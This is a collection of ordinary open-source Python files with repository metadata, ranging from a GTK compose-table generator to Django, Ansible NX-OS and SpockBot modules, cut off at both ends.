line = line[:comment_start]
else:
line = ""
comment_nest_depth += 1
else:
comment_end = line.find("*/")
if comment_end >= 0:
comment_nest_depth -= 1
if comment_nest_depth < 0:
print "Invalid comment %(linenum_compose)d in %(filename)s: \
Closing '*/' without opening '/*'" % { "linenum_compose": linenum_compose, "filename": filename_compose }
exit(-1)
if comment_nest_depth > 0:
line = ""
else:
line = line[comment_end + 2:]
if line is "":
continue
#line = line[:-1]
components = split(':', line)
if len(components) != 2:
print "Invalid line %(linenum_compose)d in %(filename)s: No sequence\
/value pair found" % { "linenum_compose": linenum_compose, "filename": filename_compose }
exit(-1)
(seq, val) = components
seq = seq.strip()
val = val.strip()
raw_sequence = findall('\w+', seq)
values = split('\s+', val)
unichar_temp = split('"', values[0])
unichar = unichar_temp[1]
if len(values) == 1:
continue
codepointstr = values[1]
if values[1] == '#':
# No codepoints that are >1 characters yet.
continue
if raw_sequence[0][0] == 'U' and match('[0-9a-fA-F]+$', raw_sequence[0][1:]):
raw_sequence[0] = '0x' + raw_sequence[0][1:]
if match('^U[0-9a-fA-F]+$', codepointstr):
codepoint = long(codepointstr[1:], 16)
elif keysymunicodedatabase.has_key(codepointstr):
#if keysymdatabase[codepointstr] != keysymunicodedatabase[codepointstr]:
#print "DIFFERENCE: 0x%(a)X 0x%(b)X" % { "a": keysymdatabase[codepointstr], "b": keysymunicodedatabase[codepointstr]},
#print raw_sequence, codepointstr
codepoint = keysymunicodedatabase[codepointstr]
else:
print
print "Invalid codepoint at line %(linenum_compose)d in %(filename)s:\
%(line)s" % { "linenum_compose": linenum_compose, "filename": filename_compose, "line": line }
exit(-1)
sequence = rename_combining(raw_sequence)
reject_this = False
for i in sequence:
if keysymvalue(i) > 0xFFFF:
reject_this = True
if opt_plane1:
print sequence
break
if keysymvalue(i) < 0:
reject_this = True
break
if reject_this:
continue
if "U0342" in sequence or \
"U0313" in sequence or \
"U0314" in sequence or \
"0x0313" in sequence or \
"0x0342" in sequence or \
"0x0314" in sequence:
continue
if "dead_belowring" in sequence or\
"dead_currency" in sequence or\
"dead_belowcomma" in sequence or\
"dead_belowmacron" in sequence or\
"dead_belowtilde" in sequence or\
"dead_belowbreve" in sequence or\
"dead_belowdiaeresis" in sequence or\
"dead_belowcircumflex" in sequence:
continue
#for i in range(len(sequence)):
# if sequence[i] == "0x0342":
# sequence[i] = "dead_tilde"
if "Multi_key" not in sequence:
""" Ignore for now >0xFFFF keysyms """
if codepoint < 0xFFFF:
original_sequence = copy(sequence)
stats_sequence = copy(sequence)
base = sequence.pop()
basechar = keysymvalue(base, filename_compose, linenum_compose)
if basechar < 0xFFFF:
counter = 1
unisequence = []
not_normalised = True
skipping_this = False
for i in range(0, len(sequence)):
""" If the sequence has dead_tilde and is for Greek, we don't do algorithmically
because of lack of dead_perispomeni (i.e. conflict)
"""
bc = basechar
"""if sequence[-1] == "dead_tilde" and (bc >= 0x370 and bc <= 0x3ff) or (bc >= 0x1f00 and bc <= 0x1fff):
skipping_this = True
break
if sequence[-1] == "dead_horn" and (bc >= 0x370 and bc <= 0x3ff) or (bc >= 0x1f00 and bc <= 0x1fff):
skipping_this = True
break
if sequence[-1] == "dead_ogonek" and (bc >= 0x370 and bc <= 0x3ff) or (bc >= 0x1f00 and bc <= 0x1fff):
skipping_this = True
break
if sequence[-1] == "dead_psili":
sequence[i] = "dead_horn"
if sequence[-1] == "dead_dasia":
sequence[-1] = "dead_ogonek"
"""
unisequence.append(unichr(keysymunicodevalue(sequence.pop(), filename_compose, linenum_compose)))
if skipping_this:
unisequence = []
for perm in all_permutations(unisequence):
# print counter, original_sequence, unichr(basechar) + "".join(perm)
# print counter, map(unichr, perm)
normalized = normalize('NFC', unichr(basechar) + "".join(perm))
if len(normalized) == 1:
# print 'Base: %(base)s [%(basechar)s], produces [%(unichar)s] (0x%(codepoint)04X)' \
# % { "base": base, "basechar": unichr(basechar), "unichar": unichar, "codepoint": codepoint },
# print "Normalized: [%(normalized)s] SUCCESS %(c)d" % { "normalized": normalized, "c": counter }
stats_sequence_data = map(keysymunicodevalue, stats_sequence)
stats_sequence_data.append(normalized)
xorg_compose_sequences_algorithmic.append(stats_sequence_data)
not_normalised = False
break
counter += 1
if not_normalised or opt_allsequences:
original_sequence.append(codepoint)
xorg_compose_sequences.append(original_sequence)
""" print xorg_compose_sequences[-1] """
else:
print "Error in base char !?!"
exit(-2)
else:
print "OVER", sequence
exit(-1)
else:
sequence.append(codepoint)
xorg_compose_sequences.append(sequence)
""" print xorg_compose_sequences[-1] """
def sequence_cmp(x, y):
if keysymvalue(x[0]) > keysymvalue(y[0]):
return 1
elif keysymvalue(x[0]) < keysymvalue(y[0]):
return -1
elif len(x) > len(y):
return 1
elif len(x) < len(y):
return -1
elif keysymvalue(x[1]) > keysymvalue(y[1]):
return 1
elif keysymvalue(x[1]) < keysymvalue(y[1]):
return -1
elif len(x) < 4:
return 0
elif keysymvalue(x[2]) > keysymvalue(y[2]):
return 1
elif keysymvalue(x[2]) < keysymvalue(y[2]):
return -1
elif len(x) < 5:
return 0
elif keysymvalue(x[3]) > keysymvalue(y[3]):
return 1
elif keysymvalue(x[3]) < keysymvalue(y[3]):
return -1
elif len(x) < 6:
return 0
elif keysymvalue(x[4]) > keysymvalue(y[4]):
return 1
elif keysymvalue(x[4]) < keysymvalue(y[4]):
return -1
else:
return 0
def sequence_unicode_cmp(x, y):
if keysymunicodevalue(x[0]) > keysymunicodevalue(y[0]):
return 1
elif keysymunicodevalue(x[0]) < keysymunicodevalue(y[0]):
return -1
elif len(x) > len(y):
return 1
elif len(x) < len(y):
return -1
elif keysymunicodevalue(x[1]) > keysymunicodevalue(y[1]):
return 1
elif keysymunicodevalue(x[1]) < keysymunicodevalue(y[1]):
return -1
elif len(x) < 4:
return 0
elif keysymunicodevalue(x[2]) > keysymunicodevalue(y[2]):
return 1
elif keysymunicodevalue(x[2]) < keysymunicodevalue(y[2]):
return -1
elif len(x) < 5:
return 0
elif keysymunicodevalue(x[3]) > keysymunicodevalue(y[3]):
return 1
elif keysymunicodevalue(x[3]) < keysymunicodevalue(y[3]):
return -1
elif len(x) < 6:
return 0
elif keysymunicodevalue(x[4]) > keysymunicodevalue(y[4]):
return 1
elif keysymunicodevalue(x[4]) < keysymunicodevalue(y[4]):
return -1
else:
return 0
def sequence_algorithmic_cmp(x, y):
if len(x) < len(y):
return -1
elif len(x) > len(y):
return 1
else:
for i in range(len(x)):
if x[i] < y[i]:
return -1
elif x[i] > y[i]:
return 1
return 0
xorg_compose_sequences.sort(sequence_cmp)
xorg_compose_sequences_uniqued = []
first_time = True
item = None
for next_item in xorg_compose_sequences:
if first_time:
first_time = False
item = next_item
if sequence_unicode_cmp(item, next_item) != 0:
xorg_compose_sequences_uniqued.append(item)
item = next_item
xorg_compose_sequences = copy(xorg_compose_sequences_uniqued)
counter_multikey = 0
for item in xorg_compose_sequences:
if findall('Multi_key', "".join(item[:-1])) != []:
counter_multikey += 1
xorg_compose_sequences_algorithmic.sort(sequence_algorithmic_cmp)
xorg_compose_sequences_algorithmic_uniqued = uniq(xorg_compose_sequences_algorithmic)
firstitem = ""
num_first_keysyms = 0
zeroes = 0
num_entries = 0
num_algorithmic_greek = 0
for sequence in xorg_compose_sequences:
if keysymvalue(firstitem) != keysymvalue(sequence[0]):
firstitem = sequence[0]
num_first_keysyms += 1
zeroes += 6 - len(sequence) + 1
num_entries += 1
for sequence in xorg_compose_sequences_algorithmic_uniqued:
ch = ord(sequence[-1:][0])
if ch >= 0x370 and ch <= 0x3ff or ch >= 0x1f00 and ch <= 0x1fff:
num_algorithmic_greek += 1
if opt_algorithmic:
for sequence in xorg_compose_sequences_algorithmic_uniqued:
letter = "".join(sequence[-1:])
print '0x%(cp)04X, %(uni)s, seq: [ <0x%(base)04X>,' % { 'cp': ord(unicode(letter)), 'uni': letter.encode('utf-8'), 'base': sequence[-2] },
for elem in sequence[:-2]:
print "<0x%(keysym)04X>," % { 'keysym': elem },
""" Yeah, verified... We just want to keep the output similar to -u, so we can compare/sort easily """
print "], recomposed as", letter.encode('utf-8'), "verified"
def num_of_keysyms(seq):
return len(seq) - 1
def convert_UnotationToHex(arg):
if isinstance(arg, str):
if match('^U[0-9A-F][0-9A-F][0-9A-F][0-9A-F]$', arg):
return sub('^U', '0x', arg)
return arg
def addprefix_GDK(arg):
if match('^0x', arg):
return '%(arg)s, ' % { 'arg': arg }
else:
return 'GDK_KEY_%(arg)s, ' % { 'arg': arg }
if opt_gtk:
first_keysym = ""
sequence = []
compose_table = []
ct_second_part = []
ct_sequence_width = 2
start_offset = num_first_keysyms * (WIDTHOFCOMPOSETABLE+1)
we_finished = False
counter = 0
sequence_iterator = iter(xorg_compose_sequences)
sequence = sequence_iterator.next()
while True:
first_keysym = sequence[0] # Set the first keysym
compose_table.append([first_keysym, 0, 0, 0, 0, 0])
while sequence[0] == first_keysym:
compose_table[counter][num_of_keysyms(sequence)-1] += 1
try:
sequence = sequence_iterator.next()
except StopIteration:
we_finished = True
break
if we_finished:
break
counter += 1
ct_index = start_offset
for line_num in range(len(compose_table)):
for i in range(WIDTHOFCOMPOSETABLE):
occurences = compose_table[line_num][i+1]
compose_table[line_num][i+1] = ct_index
ct_index += occurences * (i+2)
for sequence in xorg_compose_sequences:
ct_second_part.append(map(convert_UnotationToHex, sequence))
print headerfile_start
for i in compose_table:
if opt_gtkexpanded:
print "0x%(ks)04X," % { "ks": keysymvalue(i[0]) },
print '%(str)s' % { 'str': "".join(map(lambda x : str(x) + ", ", i[1:])) }
elif not match('^0x', i[0]):
print 'GDK_KEY_%(str)s' % { 'str': "".join(map(lambda x : str(x) + ", ", i)) }
else:
print '%(str)s' % { 'str': "".join(map(lambda x : str(x) + ", ", i)) }
for i in ct_second_part:
if opt_numeric:
for ks in i[1:][:-1]:
print '0x%(seq)04X, ' % { 'seq': keysymvalue(ks) },
print '0x%(cp)04X, ' % { 'cp':i[-1] }
"""
for ks in i[:-1]:
print '0x%(seq)04X, ' % { 'seq': keysymvalue(ks) },
print '0x%(cp)04X, ' % { 'cp':i[-1] }
"""
elif opt_gtkexpanded:
print '%(seq)s0x%(cp)04X, ' % { 'seq': "".join(map(addprefix_GDK, i[:-1])), 'cp':i[-1] }
else:
print '%(seq)s0x%(cp)04X, ' % { 'seq': "".join(map(addprefix_GDK, i[:-1][1:])), 'cp':i[-1] }
print headerfile_end
def redecompose(codepoint):
(name, decomposition, combiningclass) = unicodedatabase[codepoint]
if decomposition[0] == '' or decomposition[0] == '0':
return [codepoint]
if match('<\w+>', decomposition[0]):
numdecomposition = map(stringtohex, decomposition[1:])
return map(redecompose, numdecomposition)
numdecomposition = map(stringtohex, decomposition)
return map(redecompose, numdecomposition)
def process_unicodedata_file(verbose = False):
""" Grab from wget http://www.unicode.org/Public/UNIDATA/UnicodeData.txt """
filename_unicodedatatxt = download_file(URL_UNICODEDATATXT)
try:
unicodedatatxt = open(filename_unicodedatatxt, 'r')
except IOError, (errno, strerror):
print "I/O error(%s): %s" % (errno, strerror)
sys.exit(-1)
except:
print "Unexpected error: ", sys.exc_info()[0]
sys.exit(-1)
for line in unicodedatatxt.readlines():
if line[0] == "" or line[0] == '#':
continue
line = line[:-1]
uniproperties = split(';', line)
codepoint = stringtohex(uniproperties[0])
""" We don't do Plane 1 or CJK blocks. The latter require reading additional files. """
if codepoint > 0xFFFF or (codepoint >= 0x4E00 and codepoint <= 0x9FFF) or (codepoint >= 0xF900 and codepoint <= 0xFAFF):
continue
name = uniproperties[1]
category = uniproperties[2]
combiningclass = uniproperties[3]
decomposition = uniproperties[5]
unicodedatabase[codepoint] = [name, split('\s+', decomposition), combiningclass]
counter_combinations = 0
counter_combinations_greek = 0
counter_entries = 0
counter_entries_greek = 0
for item in unicodedatabase.keys():
(name, decomposition, combiningclass) = unicodedatabase[item]
if decomposition[0] == '':
continue
print name, "is empty"
elif match('<\w+>', decomposition[0]):
continue
print name, "has weird", decomposition[0]
else:
sequence = map(stringtohex, decomposition)
chrsequence = map(unichr, sequence)
normalized = normalize('NFC', "".join(chrsequence))
""" print name, sequence, "Combining: ", "".join(chrsequence), normalized, len(normalized), """
decomposedsequence = []
for subseq in map(redecompose, sequence):
for seqitem in subseq:
if isinstance(seqitem, list):
for i in seqitem:
if isinstance(i, list):
for j in i:
decomposedsequence.append(j)
else:
decomposedsequence.append(i)
else:
decomposedsequence.append(seqitem)
recomposedchar = normalize('NFC', "".join(map(unichr, decomposedsequence)))
if len(recomposedchar) == 1 and len(decomposedsequence) > 1:
counter_entries += 1
counter_combinations += factorial(len(decomposedsequence)-1)
ch = item
if ch >= 0x370 and ch <= 0x3ff or ch >= 0x1f00 and ch <= 0x1fff:
counter_entries_greek += 1
counter_combinations_greek += factorial(len(decomposedsequence)-1)
if verbose:
print "0x%(cp)04X, %(uni)c, seq:" % { 'cp':item, 'uni':unichr(item) },
print "[",
for elem in decomposedsequence:
print '<0x%(hex)04X>,' % { 'hex': elem },
print "], recomposed as", recomposedchar,
if unichr(item) == recomposedchar:
print "verified"
if verbose == False:
print "Unicode statistics from UnicodeData.txt"
print "Number of entries that can be algorithmically produced :", counter_entries
print " of which are for Greek :", counter_entries_greek
print "Number of compose sequence combinations requiring :", counter_combinations
print " of which are for Greek :", counter_combinations_greek
print "Note: We do not include partial compositions, "
print "thus the slight discrepancy in the figures"
print
if opt_unicodedatatxt:
process_unicodedata_file(True)
if opt_statistics:
print
print "Total number of compose sequences (from file) :", len(xorg_compose_sequences) + len(xorg_compose_sequences_algorithmic)
print " of which can be expressed algorithmically :", len(xorg_compose_sequences_algorithmic)
print " of which cannot be expressed algorithmically :", len(xorg_compose_sequences)
print " of which have Multi_key :", counter_multikey
print
print "Algorithmic (stats for Xorg Compose file)"
print "Number of sequences off due to algo from file (len(array)) :", len(xorg_compose_sequences_algorithmic)
print "Number of sequences off due to algo (uniq(sort(array))) :", len(xorg_compose_sequences_algorithmic_uniqued)
print " of which are for Greek :", num_algorithmic_greek
print
process_unicodedata_file()
print "Not algorithmic (stats from Xorg Compose file)"
print "Number of sequences :", len(xorg_compose_sequences)
print "Flat array looks like :", len(xorg_compose_sequences), "rows of 6 integers (2 bytes per int, or 12 bytes per row)"
print "Flat array would have taken up (in bytes) :", num_entries * 2 * 6, "bytes from the GTK+ library"
print "Number of items in flat array :", len(xorg_compose_sequences) * 6
print " of which are zeroes :", zeroes, "or ", (100 * zeroes) / (len(xorg_compose_sequences) * 6), " per cent"
print "Number of different first items :", num_first_keysyms
print "Number of max bytes (if using flat array) :", num_entries * 2 * 6
print "Number of savings :", zeroes * 2 - num_first_keysyms * 2 * 5
print
print "Memory needs if both algorithmic+optimised table in latest Xorg compose file"
print " :", num_entries * 2 * 6 - zeroes * 2 + num_first_keysyms * 2 * 5
print
print "Existing (old) implementation in GTK+"
print "Number of sequences in old gtkimcontextsimple.c :", 691
print "The existing (old) implementation in GTK+ takes up :", 691 * 2 * 12, "bytes"
| bsd-3-clause |
kamyu104/django | tests/auth_tests/models/custom_permissions.py | 295 | 1433 | """
The CustomPermissionsUser uses email as the identifier, but uses the normal
Django permissions model. This allows us to check that the PermissionsMixin
includes everything that is needed to interact with the ModelBackend.
"""
from django.contrib.auth.models import AbstractBaseUser, PermissionsMixin
from django.contrib.auth.tests.custom_user import (
CustomUserManager, RemoveGroupsAndPermissions,
)
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
class CustomPermissionsUserManager(CustomUserManager):
def create_superuser(self, email, password, date_of_birth):
u = self.create_user(email, password=password, date_of_birth=date_of_birth)
u.is_superuser = True
u.save(using=self._db)
return u
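# Illustrative use (values assumed, not part of the test suite):
#   from datetime import date
#   admin = CustomPermissionsUser.custom_objects.create_superuser(
#       'admin@example.com', 'secret', date(1976, 11, 8))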
with RemoveGroupsAndPermissions():
@python_2_unicode_compatible
class CustomPermissionsUser(AbstractBaseUser, PermissionsMixin):
email = models.EmailField(verbose_name='email address', max_length=255, unique=True)
date_of_birth = models.DateField()
custom_objects = CustomPermissionsUserManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['date_of_birth']
class Meta:
app_label = 'auth'
def get_full_name(self):
return self.email
def get_short_name(self):
return self.email
def __str__(self):
return self.email
| bsd-3-clause |
mukgupta/django-fast-deploy | fab_deploy_tests/test_project3/test_project3/wsgi.py | 1 | 1148 | """
WSGI config for test_project3 project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "test_project3.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
| bsd-3-clause |
tgsd96/gargnotes | venv/lib/python2.7/site-packages/django/conf/locale/cy/formats.py | 160 | 1822 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'j F Y' # '25 Hydref 2006'
TIME_FORMAT = 'P' # '2:30 y.b.'
DATETIME_FORMAT = 'j F Y, P' # '25 Hydref 2006, 2:30 y.b.'
YEAR_MONTH_FORMAT = 'F Y' # 'Hydref 2006'
MONTH_DAY_FORMAT = 'j F' # '25 Hydref'
SHORT_DATE_FORMAT = 'd/m/Y' # '25/10/2006'
SHORT_DATETIME_FORMAT = 'd/m/Y P' # '25/10/2006 2:30 y.b.'
FIRST_DAY_OF_WEEK = 1 # 'Dydd Llun'
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
DATE_INPUT_FORMATS = (
'%d/%m/%Y', '%d/%m/%y', # '25/10/2006', '25/10/06'
)
DATETIME_INPUT_FORMATS = (
'%Y-%m-%d %H:%M:%S', # '2006-10-25 14:30:59'
'%Y-%m-%d %H:%M:%S.%f', # '2006-10-25 14:30:59.000200'
'%Y-%m-%d %H:%M', # '2006-10-25 14:30'
'%Y-%m-%d', # '2006-10-25'
'%d/%m/%Y %H:%M:%S', # '25/10/2006 14:30:59'
'%d/%m/%Y %H:%M:%S.%f', # '25/10/2006 14:30:59.000200'
'%d/%m/%Y %H:%M', # '25/10/2006 14:30'
'%d/%m/%Y', # '25/10/2006'
'%d/%m/%y %H:%M:%S', # '25/10/06 14:30:59'
'%d/%m/%y %H:%M:%S.%f', # '25/10/06 14:30:59.000200'
'%d/%m/%y %H:%M', # '25/10/06 14:30'
'%d/%m/%y', # '25/10/06'
)
DECIMAL_SEPARATOR = '.'
THOUSAND_SEPARATOR = ','
NUMBER_GROUPING = 3
| mit |
luken/SpockBot | spockbot/plugins/helpers/movement.py | 2 | 2851 | """
MovementPlugin provides a centralized plugin for controlling client
movement so the client doesn't try to pull itself in a dozen
directions.
"""
from spockbot.plugins.base import PluginBase, pl_announce
from spockbot.plugins.tools.event import EVENT_UNREGISTER
from spockbot.vector import Vector3
class MovementCore(object):
def __init__(self, plug):
self.__plug = plug
self.move_to = plug.new_path
def stop(self):
self.__plug.path_nodes = None
@property
def is_moving(self):
return self.__plug.path_nodes is not None
@property
def current_path(self):
return self.__plug.path_nodes
@property
def current_target(self):
p = self.current_path
return p[0] if p else None
@property
def final_target(self):
p = self.current_path
return p[-1] if p else None
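# Illustrative use from another plugin (a sketch; names come from this
# module, which provides the core object under the 'Movement' key):
#   movement.move_to(100, 64, -200)       # pathfind toward x, y, z
#   if movement.is_moving:
#       target = movement.current_target  # next node on the active path
#   movement.stop()                       # abandon the current path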
@pl_announce('Movement')
class MovementPlugin(PluginBase):
requires = ('ClientInfo', 'Event', 'Net', 'Pathfinding', 'Physics')
events = {
'client_tick': 'client_tick',
'client_position_update': 'handle_position_update',
'client_join_game': 'handle_join_game',
}
def __init__(self, ploader, settings):
super(MovementPlugin, self).__init__(ploader, settings)
self.flag_pos_reset = False
self.movement = MovementCore(self)
self.connected_to_server = False
ploader.provides('Movement', self.movement)
self.path_nodes = None
def client_tick(self, name, data):
if not self.connected_to_server:
return
self.net.push_packet('PLAY>Player Position and Look',
self.clientinfo.position.get_dict())
if self.flag_pos_reset:
self.event.emit('movement_position_reset')
self.flag_pos_reset = False
def handle_join_game(self, name, data):
self.connected_to_server = True
def handle_position_update(self, name, data):
self.flag_pos_reset = True
def new_path(self, *xyz):
target = Vector3(*xyz)
self.pathfinding.pathfind(
self.clientinfo.position, target, self.path_cb
)
def path_cb(self, result):
self.path_nodes = result
self.event.emit('movement_path_done')
self.event.reg_event_handler('action_tick', self.follow_path)
def follow_path(self, _, __):
if not self.path_nodes:
self.movement.stop()
return EVENT_UNREGISTER
target = self.path_nodes[0]
jumped = False
if target.is_jump and self.clientinfo.position.on_ground:
self.physics.jump()
jumped = True
if self.physics.move_target(target) or jumped:
self.path_nodes.popleft()
if not self.path_nodes:
self.movement.stop()
| mit |
aagusti/i-sipkd | setup.py | 1 | 1775 | import os
import sys
import subprocess
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
README = open(os.path.join(here, 'README.txt')).read()
CHANGES = open(os.path.join(here, 'CHANGES.txt')).read()
requires=['pyramid>=1.5a2',
'SQLAlchemy',
'transaction',
'pyramid_tm',
'pyramid_debugtoolbar',
'zope.sqlalchemy',
'waitress',
'ziggurat-foundations',
'colander',
'deform>=2.0a2',
'pyramid_chameleon',
'psycopg2',
'alembic>=0.3.4',
'pyramid_beaker',
'pytz',
]
if sys.argv[1:] and sys.argv[1] == 'develop-use-pip':
bin_ = os.path.split(sys.executable)[0]
pip = os.path.join(bin_, 'pip')
for package in requires:
cmd = [pip, 'install', package]
subprocess.call(cmd)
cmd = [sys.executable, sys.argv[0], 'develop']
subprocess.call(cmd)
sys.exit()
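# Assumed invocation of the branch above:
#   python setup.py develop-use-pip
# installs every entry of `requires` through pip one by one, then re-runs
# "python setup.py develop" and exits.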
setup(name='esipkd',
version='0.0',
description='esipkd',
long_description=README + '\n\n' + CHANGES,
classifiers=[
"Programming Language :: Python",
"Framework :: Pylons",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Internet :: WWW/HTTP :: WSGI :: Application",
],
author='',
author_email='',
url='',
keywords='web pyramid pylons',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
install_requires=requires,
tests_require=requires,
test_suite="esipkd",
entry_points = """\
[paste.app_factory]
main = esipkd:main
[console_scripts]
initialize_esipkd_db = esipkd.scripts.initializedb:main
""",
)
| lgpl-3.0 |
afandria/mojo | mojo/python/tests/bindings_constants_unittest.py | 10 | 1458 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import math
import unittest
# Generated files
# pylint: disable=F0401
import sample_service_mojom
import test_constants_mojom
class ConstantBindingsTest(unittest.TestCase):
def testConstantGeneration(self):
self.assertEquals(test_constants_mojom.INT8_VALUE, -2)
self.assertEquals(test_constants_mojom.UINT64_VALUE, 9999999999999999999)
self.assertEquals(test_constants_mojom.DOUBLE_INFINITY,
float('inf'))
self.assertEquals(test_constants_mojom.DOUBLE_NEGATIVE_INFINITY,
float('-inf'))
self.assertTrue(math.isnan(test_constants_mojom.DOUBLE_NA_N))
self.assertEquals(test_constants_mojom.FLOAT_INFINITY,
float('inf'))
self.assertEquals(test_constants_mojom.FLOAT_NEGATIVE_INFINITY,
float('-inf'))
self.assertTrue(math.isnan(test_constants_mojom.FLOAT_NA_N))
def testConstantOnStructGeneration(self):
self.assertEquals(test_constants_mojom.StructWithConstants.INT8_VALUE, 5)
def testStructImmutability(self):
with self.assertRaises(AttributeError):
sample_service_mojom.Foo.FOOBY = 0
with self.assertRaises(AttributeError):
del sample_service_mojom.Foo.FOOBY
with self.assertRaises(AttributeError):
sample_service_mojom.Foo.BAR = 1
| bsd-3-clause |
gptech/ansible | lib/ansible/plugins/action/nxos.py | 14 | 6174 | #
# (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import sys
import copy
from ansible.plugins.action.normal import ActionModule as _ActionModule
from ansible.utils.path import unfrackpath
from ansible.plugins import connection_loader
from ansible.module_utils.basic import AnsibleFallbackNotFound
from ansible.module_utils.nxos import nxos_argument_spec
from ansible.module_utils.six import iteritems
from ansible.module_utils._text import to_bytes
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
class ActionModule(_ActionModule):
def run(self, tmp=None, task_vars=None):
if self._play_context.connection != 'local':
return dict(
failed=True,
msg='invalid connection specified, expected connection=local, '
'got %s' % self._play_context.connection
)
provider = self.load_provider()
transport = provider['transport'] or 'cli'
display.vvvv('connection transport is %s' % transport, self._play_context.remote_addr)
if transport == 'cli':
pc = copy.deepcopy(self._play_context)
pc.connection = 'network_cli'
pc.network_os = 'nxos'
pc.remote_addr = provider['host'] or self._play_context.remote_addr
pc.port = provider['port'] or self._play_context.port or 22
pc.remote_user = provider['username'] or self._play_context.connection_user
pc.password = provider['password'] or self._play_context.password
pc.private_key_file = provider['ssh_keyfile'] or self._play_context.private_key_file
pc.timeout = provider['timeout'] or self._play_context.timeout
display.vvv('using connection plugin %s' % pc.connection, pc.remote_addr)
connection = self._shared_loader_obj.connection_loader.get('persistent', pc, sys.stdin)
socket_path = self._get_socket_path(pc)
display.vvvv('socket_path: %s' % socket_path, pc.remote_addr)
if not os.path.exists(socket_path):
# start the connection if it isn't started
rc, out, err = connection.exec_command('open_shell()')
display.vvvv('open_shell() returned %s %s %s' % (rc, out, err))
if rc != 0:
return {'failed': True,
'msg': 'unable to open shell. Please see: '
+ 'https://docs.ansible.com/ansible/network_debug_troubleshooting.html#unable-to-open-shell',
'rc': rc}
else:
# make sure we are in the right cli context which should be
# enable mode and not config mode
rc, out, err = connection.exec_command('prompt()')
while str(out).strip().endswith(')#'):
display.vvvv('wrong context, sending exit to device', self._play_context.remote_addr)
connection.exec_command('exit')
rc, out, err = connection.exec_command('prompt()')
task_vars['ansible_socket'] = socket_path
else:
provider['transport'] = 'nxapi'
if provider.get('host') is None:
provider['host'] = self._play_context.remote_addr
if provider.get('port') is None:
provider['port'] = 80
if provider.get('timeout') is None:
provider['timeout'] = self._play_context.timeout
if provider.get('username') is None:
provider['username'] = self._play_context.connection_user
if provider.get('password') is None:
provider['password'] = self._play_context.password
if provider.get('use_ssl') is None:
provider['use_ssl'] = False
if provider.get('validate_certs') is None:
provider['validate_certs'] = True
self._task.args['provider'] = provider
# make sure a transport value is set in args
self._task.args['transport'] = transport
result = super(ActionModule, self).run(tmp, task_vars)
return result
def _get_socket_path(self, play_context):
ssh = connection_loader.get('ssh', class_only=True)
cp = ssh._create_control_path(play_context.remote_addr, play_context.port, play_context.remote_user)
path = unfrackpath("$HOME/.ansible/pc")
return cp % dict(directory=path)
def load_provider(self):
provider = self._task.args.get('provider', {})
for key, value in iteritems(nxos_argument_spec):
if key != 'provider' and key not in provider:
if key in self._task.args:
provider[key] = self._task.args[key]
elif 'fallback' in value:
provider[key] = self._fallback(value['fallback'])
elif key not in provider:
provider[key] = None
return provider
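# For reference (shape only, values illustrative): after the merge above,
# a CLI-transport provider typically ends up looking like
#   {'host': '192.0.2.1', 'port': 22, 'username': 'admin',
#    'password': '...', 'timeout': 10, 'transport': 'cli', ...}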
def _fallback(self, fallback):
strategy = fallback[0]
args = []
kwargs = {}
for item in fallback[1:]:
if isinstance(item, dict):
kwargs = item
else:
args = item
try:
return strategy(*args, **kwargs)
except AnsibleFallbackNotFound:
pass
| gpl-3.0 |
vatlab/SOS | test/check_zombie.py | 2 | 1533 | import sys
import subprocess
import psutil
def run_process(args):
proc_before = subprocess.check_output(
'ps aux | grep -v root', shell=True).decode().splitlines()
# run the main process
ret = subprocess.Popen(args)
ret.wait()
proc_after = subprocess.check_output(
'ps aux | grep -v root', shell=True).decode().splitlines()
pid_before = [
int(x.split()[1]) for x in proc_before if not 'PID' in x and 'TIME' in x
]
pid_after = [
int(x.split()[1]) for x in proc_after if not 'PID' in x and 'TIME' in x
]
possible_zombies = [name for pid,name in zip(pid_after, proc_after) if pid not in pid_before and \
psutil.Process(pid).ppid() not in pid_before]
if possible_zombies:
sys.exit(f'\nNew possible zombie processes\n{possible_zombies}')
else:
print('\nNo possible zombie process is detected')
sys.exit(ret.returncode)
if __name__ == '__main__':
if '-h' in sys.argv:
print('Usage: python check_zombie.py regular command line')
print(
'''This command executes the command and lists new processes after the completion of '''
)
print(
'''the command. Processes that are child processes of processes before execution are '''
)
print(
'''excluded. The rest of the processes could be zombie process left by the command, or '''
)
print('''new processes created during the execution of the command.''')
run_process(sys.argv[1:])
| gpl-3.0 |
LiXizhi/NPLRuntime | Client/trunk/externals/bullet3/Extras/Serialize/HeaderGenerator/blenderGenerate.py | 49 | 2903 | import dump
header = """/* Copyright (C) 2006 Charlie C
*
